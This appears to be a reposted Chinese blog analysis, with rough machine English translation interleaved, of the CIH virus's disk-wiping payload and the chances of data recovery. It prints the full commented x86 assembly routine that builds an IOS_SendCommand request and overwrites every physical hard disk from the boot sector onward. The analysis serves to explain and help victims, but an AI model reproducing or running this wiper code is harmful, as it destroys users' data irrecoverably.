IOS_SendCommand是Win95的一个非常底层的VXD调用,通常是用作对IO设备的低层操作,如:读,写,加锁,格式化等等。 IOS_SendCommand is a very low-level Win95 VXD calls, often used as a low-level operation of the IO devices, such as: read, write, locking, formatting, and so on. 一般情况下只能在Ring 0和虚拟机中使用,在普通程序中使用会有不可预料的后果! Under normal circumstances only in Ring 0 and the virtual machine to use, in the general procedures used have unpredictable consequences! 该VXD调用的功能很多,也很繁杂。 The VXD call many functions, but also very complicated. 参数数量很少,只有BCB或IOR和BDD或DCB的地址。 Small number of parameters, only the BCB or IOR and BDD or DCB address. 但这几个数据结构却包含了大量的信息,结构也相当的复杂。 However, several data structures it contains a wealth of information, the structure is quite complex. CIH 病毒只用到了IOR结构,它包含了近二十个数据,但主要用到的就是IOR_func,IOR_s tatus,IOR_flags,IOR_start_addr[2],IOR_xfer_count,IOR_buffer_ptr,IOR_req_re q_handle,IOR_req_vol_handle,IOR_sgd_lin_phys,IOR_num_sgds,IOR_vol_designtr! CIH virus uses only the IOR structure, which contains nearly 20 data, but the main use is IOR_func, IOR_s tatus, IOR_flags, IOR_start_addr [2], IOR_xfer_count, IOR_buffer_ptr, IOR_req_re q_handle, IOR_req_vol_handle, IOR_sgd_lin_phys, IOR_num_sgds, IOR_vol_designtr!
IOS_SendCommand的调用方法是: IOS_SendCommand call is:
mov esi, CmdData ; address of BCB or IOR mov esi, CmdData; address of BCB or IOR
mov edi, DevData ; address of BDD or DCB mov edi, DevData; address of BDD or DCB
VxDCall IOS_SendCommand VxDCall IOS_SendCommand
IOR的完整定义为: The complete IOR is defined as:
typedef struct _IOR { typedef struct _IOR {
ULONG IOR_next; // client link; see below ULONG IOR_next; / / client link; see below
USHORT IOR_func; // function; see below USHORT IOR_func; / / function; see below
USHORT IOR_status; // request status; see below USHORT IOR_status; / / request status; see below
ULONG IOR_flags; // request flags; see below ULONG IOR_flags; / / request flags; see below
CMDCPLT IOR_callback; // address of callback; see below CMDCPLT IOR_callback; / / address of callback; see below
ULONG IOR_start_addr[2]; // starting address; see below ULONG IOR_start_addr [2]; / / starting address; see below
ULONG IOR_xfer_count; // # of sectors/bytes; see below ULONG IOR_xfer_count; / / # of sectors / bytes; see below
ULONG IOR_buffer_ptr; // client buffer; see below ULONG IOR_buffer_ptr; / / client buffer; see below
ULONG IOR_private_client; // BlockDev/IOS client reserved ULONG IOR_private_client; / / BlockDev / IOS client reserved
ULONG IOR_private_IOS; // reserved space for IOS ULONG IOR_private_IOS; / / reserved space for IOS
ULONG IOR_private_port; // private area for port driver ULONG IOR_private_port; / / private area for port driver
union urequestor_usage _ureq; // requestor usage; see below union urequestor_usage _ureq; / / requestor usage; see below
ULONG IOR_req_req_handle; // request handle; see below ULONG IOR_req_req_handle; / / request handle; see below
ULONG IOR_req_vol_handle; // media handle; see below ULONG IOR_req_vol_handle; / / media handle; see below
ULONG IOR_sgd_lin_phys; // first physical SGD; see below ULONG IOR_sgd_lin_phys; / / first physical SGD; see below
UCHAR IOR_num_sgds; // number of physical SGDs UCHAR IOR_num_sgds; / / number of physical SGDs
UCHAR IOR_vol_designtr; // drive letter; see below UCHAR IOR_vol_designtr; / / drive letter; see below
USHORT IOR_ios_private_1; // reserved by IOS to force alignment USHORT IOR_ios_private_1; / / reserved by IOS to force alignment
ULONG IOR_reserved_2[2]; // reserved for internal use ULONG IOR_reserved_2 [2]; / / reserved for internal use
} IOR, *PIOR; } IOR, * PIOR;
CIH病毒先构造一个IOR,再使用IOS_SendCommand调用,完成IOR所指定的功能。 CIH virus first construct a IOR, then use IOS_SendCommand call to complete the functions specified IOR. 病毒在IOR中的IOR_flags中指示要写的设备为物理设备(IORF_PHYS_CMD),同步调用(IORF _SYNC_COMMAND),即在写操作完成之后才返回。 Virus in the IOR in the instructions to write in IOR_flags devices to physical devices (IORF_PHYS_CMD), synchronous call (IORF _SYNC_COMMAND), that is, the write operation is complete before returning. 然后指定第一次写的位置为0(IOR_start_a ddr[2]即0柱面0面0扇区,即主引导区),每次写入2048个字节(IOR_xfer_count),第一次为物理硬盘一 (IOR_vol_designtr=80h),需要写入的东西放在内存0c0001000h(IOR_buffe r_ptr),这个地址是无所谓的,目的只是要随便写一大串无关数据到硬盘上,只要该地址不是指向不存在的内存空间即可。 Then specify the location of the first to write 0 (IOR_start_a ddr [2] that cylinder 0 side 0 sector, ie the master boot), each write 2048 bytes (IOR_xfer_count), the first physical hard disk to one ( IOR_vol_designtr = 80h), need to write things on the memory 0c0001000h (IOR_buffe r_ptr), this address does not matter, the purpose is to just write a long list of irrelevant data to the hard disk, as long as the address does not point to memory that does not exist . 最后CIH调用IOS_SendCommand,完成一次写操作! Finally, CIH calls IOS_SendCommand, complete a write operation! 操作完成后,先判断状态(IOR_status),看是否有该设备是否正常,是则每次2048字节的一直写下去。 Operation is complete, first determine the state (IOR_status), the device to see if there is normal, is 2048 bytes each time has been written down. 如果写完一个硬盘(不太可能)或出错则把IOR_vol_designtr+1使之指向下一个物理硬盘! If you finish a hard drive (unlikely) or an error put IOR_vol_designtr +1 to point to a physical hard drive!
程序注释如下: Program Notes are as follows:
; *************************** ; ***********************************************************
; * Kill All HardDisk * ; * Kill All HardDisk *
; *************************************************** ; ************************************************* **
; * IOR Structure of IOS_SendCommand Needs * ; * IOR Structure of IOS_SendCommand Needs *
; *************************************************** ; ************************************************* **
; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? * ; *???????? 0100???? 01,050,040???????? *
; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 * ; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * ; *???????????????????????????????? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * ; *???????????????????????????????? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? * ; *?????????????????????????? 80???? *
; *************************************************** ; ************************************************* **
;0001为写功能IOR_WRITE ; 0001 for the write function IOR_WRITE
;40000501h为IOR_flags=1000000000000000000010100000001 ; 40000501h to IOR_flags = 1000000000000000000010100000001
;IORF_PHYS_CMD|IORF_VERSION_002|IORF_SYNC_COMMAND|IORF_HIGH_PRIORITY ; IORF_PHYS_CMD | IORF_VERSION_002 | IORF_SYNC_COMMAND | IORF_HIGH_PRIORITY
;IORF_PHYS_CMD指示为物理设备 ; IORF_PHYS_CMD instructions for the physical device
;IORF_SYNC_COMMAND指示为同步命令(操作完成后才返回) ; IORF_SYNC_COMMAND indicates synchronization command (operation to complete before returning)
;IORF_VERSION_002指示为扩展BCB(IOR)格式的IO请求 ; IORF_VERSION_002 instructions for the expansion of BCB (IOR) format IO requests
;IOR_start_addr[2]=00 00 00 00 00 00 00 00起始位置 ; IOR_start_addr [2] = 00 00 00 00 00 00 00 00 starting position
(注意:不是扇区,而是字节)为0 (Note: not sectors, but byte) 0
;IOR_xfer_count=800h写入2048个字节 ; IOR_xfer_count = 800h 2048 bytes written
;IOR_buffer_ptr=0c0001000h要写的内容在地址0c0001000h ; IOR_buffer_ptr = 0c0001000h write the contents of the address 0c0001000h
;IOR_vol_designtr=80h为第一个物理硬盘81h为第二个 ; IOR_vol_designtr = 80h 81h for the first physical hard drive as the second
KillHardDisk: KillHardDisk:
xor ebx, ebx xor ebx, ebx
mov bh, FirstKillHardDiskNumber mov bh, FirstKillHardDiskNumber
push ebx push ebx
sub esp, 2ch sub esp, 2ch
push 0c0001000h push 0c0001000h
mov bh, 08h mov bh, 08h
push ebx push ebx
push ecx push ecx
push ecx push ecx
push ecx push ecx
push 40000501h push 40000501h
inc ecx inc ecx
push ecx push ecx
push ecx push ecx
mov esi, esp mov esi, esp
sub esp, 0ach sub esp, 0ach
;以压栈的形式构造IOR(就是上面那一大串数据) ; To push in the form of construction IOR (that is, that long list above data)
LoopOfKillHardDisk: LoopOfKillHardDisk:
int 20h int 20h
dd 00100004h ;调用IOS_SendCommand dd 00100004h; call IOS_SendCommand
cmp word ptr [esi+06h], 0017h cmp word ptr [esi +06 h], 0017h
;IOR_status=17h=IORS_NO_DEVICE设备正常 ; IOR_status = 17h = IORS_NO_DEVICE equipment to normal
否? No?
je KillNextDataSection ;写下一块 je KillNextDataSection; write a
ChangeNextHardDisk: ChangeNextHardDisk:
inc byte ptr [esi+4dh] inc byte ptr [esi +4 dh]
;下个硬盘,80h为第一个物理硬盘81h为第二个 ; The next drive, 80h 81h for the first physical hard drive as the second
jmp LoopOfKillHardDisk ;继续杀杀杀!!!! jmp LoopOfKillHardDisk; continue Sha Shasha!!!!
KillNextDataSection: KillNextDataSection:
add dword ptr [esi+10h], ebx add dword ptr [esi +10 h], ebx
;下个区域(以800h为一块) ; The next area (to 800h as a)
mov byte ptr [esi+4dh], FirstKillHardDiskNumber mov byte ptr [esi +4 dh], FirstKillHardDiskNumber
;第一个物理硬盘80h ; First physical hard disk 80h
jmp LoopOfKillHardDisk ;继续杀杀杀!!!! jmp LoopOfKillHardDisk; continue Sha Shasha!!!!
CIH病毒发作时,先破坏Flash Memory,随后就是硬盘。 CIH virus attack, the first destruction of Flash Memory, then that is hard. 有些计算机在Flash Memo ry被破坏后就完全当机了。 Some computers in the Flash Memo ry was completely destroyed after a crash. 那要恭喜你,你的硬盘不会有太大的损失。 I would like to congratulate you, your hard drive will not be much loss. 因为Flash Memory中装有非常重要的程序和信息如BIOS,一旦破坏,机器完全死掉的可能性相当大。 Because Flash Memory is equipped with a very important program, and information such as BIOS, once damaged, the machine completely the possibility of a large dead. 既然当掉了,程序很可能执行不到杀硬盘的模块或执行一会儿便完全死机。 Since the crash, the program will most likely not kill the hard drive module implementation or execution while it died completely. 你的硬盘就会有相当大的可能恢复! You will have a large hard drive may be restored! 但是,如果病毒程序运行顺利,正如上面程序所示的,它会每次2048个字节的从主引导区开始写硬盘。 However, if the virus program is running smoothly, as shown in the above procedure, it will from each 2048 byte disk master boot sector began to write. 直到分区引导区,主目录表,文件分配表,数据区......直 Until the partition boot sector, the main directory table, file allocation table, direct data area ......
至写完整个硬盘。 To finish the entire hard drive. 然后再开始杀第二个物理硬盘。 And then began to kill the second physical hard disk. 是不是太黑了! Is not too dark! 这只是CIH病毒程序所预计的理想情况,毕竟每次写2048个字节还是比较慢。 CIH virus program is only expected Ideally, after all, write 2048 bytes each time it is quite slow. 普通一个上GB的硬盘,一个柱面有63个扇区,要写完主引导区所在的0柱面0面的63个扇区也要花点时间! GB on a regular hard drive, a cylinder has 63 sectors, where the master boot record to finish the surface of the cylinder 0 0 63 sectors have to spend some time! 如果继续写下去,破坏掉一些Win95正常运行所必须的一些文件数据,就很可能当机,这时,绝大都数人都会Reset。 If you continue to write down, destroyed a number of Win95 running some file data that must be, is likely to crash, then, are the vast number of people will Reset. 这样的话,你就很有可能保存了相当部分地硬盘数据! In this case, you will probably save a considerable part to the hard disk data! 这就是被CIH破坏了的硬盘有可能用软件修复的真正原因! This is the hard disk destroyed by CIH may use the software fix the real reason! 但千万不要以为那些软件的功能很强,足以修复所有硬盘。 But do not think that software functionality is strong enough to repair all hard drives. 硬盘的关键数据丢失太多的话,任何人都没有办法。 Critical data loss too hard, then there is no way anyone. 所以修复概率很大程度上是依赖你在病毒发作后关机的时间! Therefore, the probability of repair is largely dependent on your time off after a virus attack! 时间越短,丢失的数据越少,修复的可能就越大! Shorter, less missing data, the greater the possibility of repair! 如果只有主引导区被覆盖,那修复的可能有100%。 If only the master boot record is overwritten, it may have a 100% restored. 如果分区引导区被覆盖,那修复的可能有99%。 If the partition boot sector is covered, that repair may be 99%. 主目录表被覆盖修复的可能有,但要手动恢复。 Main Table of repair may be covered, but manual recovery. 如果文件分配表被覆盖,几乎不可能修复。 If the file allocation table is covered, almost impossible to repair. 如果数据区被覆盖,那就彻底没有希望了!实际的情况还要复杂一些,通常是顺序的数据丢失。 If the data area is overwritten, it is completely hopeless! Actual situation even more complicated, usually the order of data loss.
综上所述,CIH病毒对硬盘的破坏是逻辑的,是极据破坏性的!一旦破坏,修复的可能性较小。 In conclusion, CIH virus damage on the hard drive is logical, is very far destructive! Once damaged, repair is less likely. 一旦发作,要尽快的重起或关机,尽量减少损失!再奉劝各位一句,千万不要在没有把握的情况下,把以上程序编译执行,那将导致非常严重的后果!其实要达到以上效果,用dos下的Debug几句就可以了,何必用95下的VXD呢? Once the attack, to restart or shut down as soon as possible to minimize the loss! Then advise you one, do not take the case in the absence of, compile and run the above program, it will lead to very serious consequences! In fact, to achieve the above results, with Debug under a few dos on it, why use 95 of the VXD it? 还有就是,千万无要拿硬盘来找我修,我现在在作毕业设计,忙得很! There is, do not come to me to bring the hard disk repair, I'm in for graduation, busy person! 写这篇文章已经使我元气大伤。 I am writing this article has been decimated to make. 还不是为了广大的CIH受害者和需要了解这方面知识的同志.记住,千万千万不要! Not to the majority of the CIH and the victims need to know this knowledge comrades and remember, never, never do!
Tidak ada komentar:
Posting Komentar